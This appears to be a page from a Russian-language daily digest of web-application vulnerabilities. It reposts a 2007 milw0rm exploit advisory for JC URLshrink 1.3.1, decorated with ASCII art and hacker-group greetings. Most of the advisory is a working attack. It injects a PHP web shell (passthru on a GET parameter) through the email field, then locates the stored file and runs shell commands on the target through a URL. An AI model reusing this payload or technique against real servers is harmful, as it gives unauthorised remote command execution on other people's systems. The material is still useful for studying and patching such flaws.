Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

Eve-NukePortal file include (phpbb_root_path)

MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability

codebb 1.1b3  (phpbb_root_path )Remote File Include Vulnerability

Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities

From:	Dj7xpl <dj7xpl_(at)_yahoo.com>
Date:	2 апреля 2007 г.
Subject:	JC URLshrink 1.3.1 Remote Code Execution Vulnerability

                                                         .-
""""""""-.                                 
                                                        /   Dj7xpl   \                              
                                                       |              |                                
                                                       |,  .-.  .-.  ,|                                
                                                       | )(_o/  \o_)( |                                     
                                                       |/     /\     \|                                 
                                             (@_       (_     ^^     _)                  
                                        _     ) \_______\__|IIIIII|__/_______________________________
                                       (_)@8@8{}<________|-
\IIIIII/-|________________________________>
                                              )_/        \          /
                                              (@
  
+_______________________________________________Iranian Are The Best In World___________________________________________+
+
+                            /*************************__I N F O__**************************\
+     |*                                                            *|
+                            |*                     U R L S H R I N K                      *|
+                            |*                                                            *|
+                            |*  Portal:    Urlshrink                                      *|
+                            |*  Version:   1.3.1                                          *|
+     |*  Release:   26-07-2006                                     *|
+                            |*  www:       www.developers.jccorp.net                      *|
+                            |*  Author:    Dj7xpl  | Dj7xpl@yahoo.com                     *|
+                            |*                                                            *|
+                            \*************************************************
*************/
+________________________________________________________________________________
_______________________________________+



+________________________________________________________E X P L O I T__________________________________________________+
+
+
+                         E X P L O I T - -
+                         --------------
+
+                               1) Insert Bad Code
+
+ [X] Enter Your URL to shrink:   (Enter Random Url)  E.g : milw0m.com
+ [X] Enter your Email Address:   (Enter Bad Code)    E.g : <?php passthru($_GET[cmd]);?>
+
+
+
+        2) See Folder Name
+
+ [X] http://[Target]/[Path]/data/tally.php
+ [X] http://localhost/urlshrink/data/tally.php       E.g : 5
+
+
+
+        3) Visit Your Code
+
+ [X] http://localhost/urlshrink/[Folder Name]/email.php  
+    E.g : http://localhost/urlshrink/5/email.php?cmd=ls -la
+
+
+                  
+
+________________________________________________________________________________
_______________________________________+


+___________________________________________________________T N X_______________________________________________________+
+
+
+          Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org, Simorgh .............
+   
+________________________________________________________________________________
_______________________________________+

# milw0rm.com [2007-03-30]